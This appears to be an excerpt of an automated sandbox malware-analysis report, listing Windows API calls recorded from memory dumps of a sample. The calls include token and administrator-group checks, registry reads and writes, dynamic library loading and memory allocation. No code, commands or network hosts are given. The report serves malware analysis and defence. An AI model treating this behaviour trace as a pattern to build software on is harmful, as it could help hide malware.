    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040453A
    • GetCurrentProcess.KERNEL32(00000008,004019F5,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404546
    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040454D
    • GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 00404570
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404572
    • GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404587
    • GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 004045A7
    • ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 004045B7
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 00404601
    • HeapAlloc.KERNEL32(00000000), ref: 00404608
    • GetCapture.USER32 ref: 00404617
    • StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00404647
    • LocalFree.KERNEL32(76AD46E9), ref: 0040465B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404664
    • HeapFree.KERNEL32(00000000), ref: 0040466B
    • GlobalFree.KERNEL32(00000000), ref: 00404675
    • CloseHandle.KERNEL32(004019F5), ref: 0040467F
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000004D,00412000,7142434B,001CFDA8), ref: 0040FD46
    • HeapAlloc.KERNEL32(00000000), ref: 0040FD49
    • GetDialogBaseUnits.USER32 ref: 0040FD64
    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0040FD98
    • GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040FDFD
    • HeapAlloc.KERNEL32(00000000), ref: 0040FE00
    • CloseClipboard.USER32 ref: 0040FE14
    • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0040FE47
    • RegCloseKey.ADVAPI32(00000000), ref: 0040FE50
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE5F
    • HeapFree.KERNEL32(00000000), ref: 0040FE62
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE6E
    • HeapFree.KERNEL32(00000000), ref: 0040FE71
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 0040EB13
    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040EB16
    • GetTickCount.KERNEL32(?,00000000), ref: 0040EB2B
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000), ref: 0040EB76
    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040EB79
    • GetShellWindow.USER32 ref: 0040EB8D
    • LoadLibraryA.KERNEL32(00000000), ref: 0040EBBE
    • GetProcAddress.KERNEL32(00000000,?,00000000), ref: 0040EBC5
    • GetProcessHeap.KERNEL32(00000008,?,?,00000000), ref: 0040EBD6
    • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040EBDD
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0040EC3C
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0040EC3F
    • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0040EC48
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0040EC4B
    • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0040EC5F
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0040EC66
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,00401A31), ref: 0040E6FD
    • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E703
    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x,0040F467), ref: 0040E70E
      • Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,001CFDA8), ref: 004073EF
      • Part of subcall function 004073B6: HeapAlloc.KERNEL32(00000000), ref: 004073F2
      • Part of subcall function 004073B6: GetLogicalDrives.KERNEL32 ref: 00407406
      • Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00407460
      • Part of subcall function 004073B6: HeapAlloc.KERNEL32(00000000), ref: 00407463
      • Part of subcall function 004073B6: IsSystemResumeAutomatic.KERNEL32 ref: 00407477
      • Part of subcall function 004073B6: GetModuleHandleA.KERNEL32(00000000,?), ref: 004074A8
      • Part of subcall function 004073B6: GetProcAddress.KERNEL32(00000000), ref: 004074AF
      • Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004074BE
      • Part of subcall function 004073B6: HeapFree.KERNEL32(00000000), ref: 004074C7
      • Part of subcall function 004073B6: GetProcessHeap.KERNEL32(00000000,?), ref: 004074CC
      • Part of subcall function 004073B6: HeapFree.KERNEL32(00000000), ref: 004074CF
      • Part of subcall function 0040E684: GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
      • Part of subcall function 0040E684: GetProcAddress.KERNEL32(00000000), ref: 0040E6C4
    • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?,?,?,?,?,?,00401A31), ref: 0040E72D
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401A31,?,?,?,?,?,KCBqiNhR7x), ref: 0040E736
    • GetComputerNameW.KERNEL32(00000000,?), ref: 0040E751
    • GetProcessHeap.KERNEL32(00000008,0000001D,?), ref: 0040E78C
    • HeapAlloc.KERNEL32(00000000), ref: 0040E78F
    • GetClipboardOwner.USER32 ref: 0040E79C
    • lstrcpyW.KERNEL32(00000000), ref: 0040E7CF
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E7DE
    • HeapFree.KERNEL32(00000000), ref: 0040E7E1
      • Part of subcall function 0040E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0040E7ED,?), ref: 0040E39F
      • Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0040E3B7
      • Part of subcall function 0040E310: HeapAlloc.KERNEL32(00000000), ref: 0040E3BE
      • Part of subcall function 0040E310: RegQueryValueExA.ADVAPI32(0040E7ED,?,00000000,00000000,00000000,?), ref: 0040E3EB
      • Part of subcall function 0040E310: RegQueryValueExA.ADVAPI32(0040E7ED,74736E49,00000000,00000000,?,00000004), ref: 0040E411
      • Part of subcall function 0040E310: RegQueryValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000000,?,00000004), ref: 0040E43F
      • Part of subcall function 0040E310: GetTickCount.KERNEL32 ref: 0040E445
      • Part of subcall function 0040E310: RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E451
      • Part of subcall function 0040E310: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0040E7ED), ref: 0040E467
      • Part of subcall function 0040E310: RegSetValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000004,?,00000004), ref: 0040E482
      • Part of subcall function 0040E310: RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E499
      • Part of subcall function 0040E310: lstrlenA.KERNEL32(00000008), ref: 0040E4A5
      • Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E4CB
      • Part of subcall function 0040E310: HeapAlloc.KERNEL32(00000000), ref: 0040E4D2
      • Part of subcall function 0040E310: GetComputerNameA.KERNEL32(00000000,00000004), ref: 0040E4DF
      • Part of subcall function 0040E310: lstrlenA.KERNEL32(00000000), ref: 0040E4E6
      • Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E503
      • Part of subcall function 0040E310: HeapFree.KERNEL32(00000000), ref: 0040E510
      • Part of subcall function 0040E310: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E517
      • Part of subcall function 0040E310: HeapFree.KERNEL32(00000000), ref: 0040E51E
    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040E80F
    • CheckTokenMembership.ADVAPI32(00000000,?,00401A31), ref: 0040E82A
    • FreeSid.ADVAPI32(?), ref: 0040E836
      • Part of subcall function 0040E967: GetCurrentProcess.KERNEL32(00020008,0040E84F), ref: 0040E984
      • Part of subcall function 0040E967: OpenProcessToken.ADVAPI32(00000000), ref: 0040E98B
      • Part of subcall function 0040E967: GetTokenInformation.ADVAPI32(0040E84F,00000014,00000000,00000004,?), ref: 0040E9A4
      • Part of subcall function 0040E967: CloseHandle.KERNEL32(0040E84F), ref: 0040E9AD
    • CreateWellKnownSid.ADVAPI32(00000027,00000000,?,00401A31), ref: 0040E866
    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0040E87C
      • Part of subcall function 0040E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0040F1FF), ref: 0040E8A6
      • Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,?,?,?,0040F1FF), ref: 0040E8C2
      • Part of subcall function 0040E897: GetLastError.KERNEL32(?,0040F1FF), ref: 0040E8D0
      • Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0040F1FF), ref: 0040E8E1
      • Part of subcall function 0040E897: HeapAlloc.KERNEL32(00000000,?,0040F1FF), ref: 0040E8E8
      • Part of subcall function 0040E897: GetTokenInformation.ADVAPI32(?,00000019,00000000,?,?,?,0040F1FF), ref: 0040E901
      • Part of subcall function 0040E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0040F1FF), ref: 0040E90D
      • Part of subcall function 0040E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0040F1FF), ref: 0040E924
      • Part of subcall function 0040E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0040F1FF), ref: 0040E946
      • Part of subcall function 0040E897: HeapFree.KERNEL32(00000000,?,0040F1FF), ref: 0040E94D
      • Part of subcall function 0040E897: CloseHandle.KERNEL32(?), ref: 0040E957
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00403971
    • GetProcessHeap.KERNEL32(00000008,00000025), ref: 004039B0
    • HeapAlloc.KERNEL32(00000000), ref: 004039B7
    • GetCurrentProcessId.KERNEL32 ref: 004039C8
    • GetProcessHeap.KERNEL32(00000008,00000051), ref: 00403A72
    • HeapAlloc.KERNEL32(00000000), ref: 00403A79
    • GetForegroundWindow.USER32 ref: 00403A8A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403AC8
    • HeapFree.KERNEL32(00000000), ref: 00403ACF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 0040790B
    • HeapAlloc.KERNEL32(00000000), ref: 0040790E
    • GetShellWindow.USER32 ref: 00407923
    • GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040797E
    • HeapAlloc.KERNEL32(00000000), ref: 00407981
    • GetDoubleClickTime.USER32 ref: 00407995
    • GetModuleHandleA.KERNEL32(Fz@), ref: 004079C5
    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004079CD
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004079E8
    • HeapFree.KERNEL32(00000000), ref: 004079F5
    • GetProcessHeap.KERNEL32(00000000,Fz@), ref: 004079FA
    • HeapFree.KERNEL32(00000000), ref: 00407A01
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • OpenProcess.KERNEL32(00000400,00000000), ref: 00404AFF
    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00404B21
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404B58
    • HeapAlloc.KERNEL32(00000000), ref: 00404B5F
    • GetForegroundWindow.USER32 ref: 00404B70
    • wsprintfA.USER32 ref: 00404BAD
    • FindAtomA.KERNEL32(?), ref: 00404BBD
    • GlobalFindAtomA.KERNEL32(?), ref: 00404BD2
    • GlobalAddAtomA.KERNEL32(?), ref: 00404BE4
    • AddAtomA.KERNEL32(?), ref: 00404BF1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404BFD
    • HeapFree.KERNEL32(00000000), ref: 00404C04
    • CloseHandle.KERNEL32(?), ref: 00404C0D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,00000000), ref: 0040BA29
    • HeapAlloc.KERNEL32(00000000), ref: 0040BA2C
    • GetShellWindow.USER32 ref: 0040BA40
    • GetProcessHeap.KERNEL32(00000008,00000011), ref: 0040BA9F
    • HeapAlloc.KERNEL32(00000000), ref: 0040BAA2
    • GetMessageTime.USER32 ref: 0040BAB6
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0040BAE7
    • GetProcAddress.KERNEL32(00000000), ref: 0040BAEE
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000208,0041CAA8), ref: 00403E3F
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403E42
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00403ED2
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403ED9
      • Part of subcall function 00403E17: GetTickCount.KERNEL32 ref: 00403EED
      • Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403F24
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403F6E
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 00403F71
      • Part of subcall function 00403E17: GetCaretBlinkTime.USER32 ref: 00403F86
      • Part of subcall function 00403E17: wsprintfW.USER32 ref: 00403FC8
      • Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0040401D
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 0040402C
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040402F
      • Part of subcall function 00403E17: RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00404051
      • Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 00404077
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000008,?), ref: 00404099
      • Part of subcall function 00403E17: HeapAlloc.KERNEL32(00000000), ref: 0040409C
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 004040AE
      • Part of subcall function 00403E17: HeapReAlloc.KERNEL32(00000000), ref: 004040B1
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004040D5
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040D8
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 004040E4
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 004040ED
      • Part of subcall function 00403E17: RegCloseKey.ADVAPI32(?), ref: 004040FC
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,?), ref: 00404107
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 0040410A
      • Part of subcall function 00403E17: GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00404112
      • Part of subcall function 00403E17: HeapFree.KERNEL32(00000000), ref: 00404115
      • Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
      • Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BB23
    • HeapFree.KERNEL32(00000000), ref: 0040BB2C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BB31
    • HeapFree.KERNEL32(00000000), ref: 0040BB34
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00404C65
    • HeapAlloc.KERNEL32(00000000), ref: 00404C68
    • GetMessageTime.USER32 ref: 00404C7D
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404CD4
    • HeapAlloc.KERNEL32(00000000), ref: 00404CD7
    • IsSystemResumeAutomatic.KERNEL32 ref: 00404CEB
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 00404D1C
    • GetProcAddress.KERNEL32(00000000), ref: 00404D23
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404D4F
    • HeapFree.KERNEL32(00000000), ref: 00404D5C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 00404D61
    • HeapFree.KERNEL32(00000000), ref: 00404D68
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0040D7EF
    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0040D7F2
    • GetShellWindow.USER32 ref: 0040D803
    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0040D83D
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0040D86B
    • CloseHandle.KERNEL32 ref: 0040D880
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D88E
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D891
    • StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0040D89F
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040D8A7
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 0040D8AA
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,76E2204D,00000000,?), ref: 0040F888
    • HeapAlloc.KERNEL32(00000000), ref: 0040F88F
    • GetShellWindow.USER32 ref: 0040F8A1
    • GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040F905
    • HeapAlloc.KERNEL32(00000000), ref: 0040F90C
    • CloseClipboard.USER32 ref: 0040F920
    • LoadLibraryA.KERNEL32(?), ref: 0040F951
    • GetProcAddress.KERNEL32(00000000), ref: 0040F958
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
      • Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
      • Part of subcall function 0040F4A9: GetShellWindow.USER32 ref: 0040F4FD
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
      • Part of subcall function 0040F4A9: HeapAlloc.KERNEL32(00000000), ref: 0040F560
      • Part of subcall function 0040F4A9: GetInputState.USER32 ref: 0040F574
      • Part of subcall function 0040F4A9: GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
      • Part of subcall function 0040F4A9: GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
      • Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5C2
      • Part of subcall function 0040F4A9: GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
      • Part of subcall function 0040F4A9: HeapFree.KERNEL32(00000000), ref: 0040F5CE
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F971
    • HeapFree.KERNEL32(00000000), ref: 0040F97E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F983
    • HeapFree.KERNEL32(00000000), ref: 0040F98A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00000000), ref: 0040F4DE
    • HeapAlloc.KERNEL32(00000000), ref: 0040F4E1
    • GetShellWindow.USER32 ref: 0040F4FD
    • GetProcessHeap.KERNEL32(00000008,00000017), ref: 0040F55D
    • HeapAlloc.KERNEL32(00000000), ref: 0040F560
    • GetInputState.USER32 ref: 0040F574
    • GetModuleHandleA.KERNEL32(?,00000000), ref: 0040F59E
    • GetProcAddress.KERNEL32(00000000), ref: 0040F5A5
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F5B5
    • HeapFree.KERNEL32(00000000), ref: 0040F5C2
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040F5C7
    • HeapFree.KERNEL32(00000000), ref: 0040F5CE
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,001CFDA8), ref: 0040E140
    • HeapAlloc.KERNEL32(00000000), ref: 0040E143
    • GetShellWindow.USER32 ref: 0040E155
    • GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0040E1BD
    • HeapAlloc.KERNEL32(00000000), ref: 0040E1C0
    • ReleaseCapture.USER32 ref: 0040E1D4
    • LoadLibraryA.KERNEL32(?), ref: 0040E1FE
    • GetProcAddress.KERNEL32(00000000), ref: 0040E205
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E219
    • HeapFree.KERNEL32(00000000), ref: 0040E222
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E227
    • HeapFree.KERNEL32(00000000), ref: 0040E22A
    • VirtualAlloc.KERNEL32(00000000,7142424B,00003000,00000004), ref: 0040E261
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040E2E1
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
      • Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 00407530
      • Part of subcall function 004074D8: GetMessageTime.USER32 ref: 00407544
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
      • Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 004075A1
      • Part of subcall function 004074D8: IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
      • Part of subcall function 004074D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
      • Part of subcall function 004074D8: GetProcAddress.KERNEL32(00000000), ref: 004075ED
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
      • Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 0040760A
      • Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
      • Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 00407612
      • Part of subcall function 004074D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
      • Part of subcall function 004074D8: CloseHandle.KERNEL32(00000000), ref: 0040764D
      • Part of subcall function 0040E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0040E625
      • Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0040E634
      • Part of subcall function 0040E60D: HeapAlloc.KERNEL32(00000000), ref: 0040E63B
      • Part of subcall function 0040E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0040E654
      • Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E66D
      • Part of subcall function 0040E60D: HeapFree.KERNEL32(00000000), ref: 0040E674
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
    • HeapAlloc.KERNEL32(00000000), ref: 00407530
    • GetMessageTime.USER32 ref: 00407544
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
    • HeapAlloc.KERNEL32(00000000), ref: 004075A1
    • IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
    • GetProcAddress.KERNEL32(00000000), ref: 004075ED
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
    • HeapFree.KERNEL32(00000000), ref: 0040760A
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
    • HeapFree.KERNEL32(00000000), ref: 00407612
    • OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
    • CloseHandle.KERNEL32(00000000), ref: 0040764D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000001F,00000000,?,00000000), ref: 004076D7
    • HeapAlloc.KERNEL32(00000000), ref: 004076DA
    • GetProcessHeap.KERNEL32 ref: 004076EF
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040773B
    • HeapAlloc.KERNEL32(00000000), ref: 0040773E
    • IsSystemResumeAutomatic.KERNEL32 ref: 00407752
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 00407783
    • GetProcAddress.KERNEL32(00000000), ref: 0040778A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040779E
    • HeapFree.KERNEL32(00000000), ref: 004077A7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004077AC
    • HeapFree.KERNEL32(00000000), ref: 004077AF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00407185
    • HeapAlloc.KERNEL32(00000000), ref: 0040718C
    • RevertToSelf.ADVAPI32 ref: 004071A5
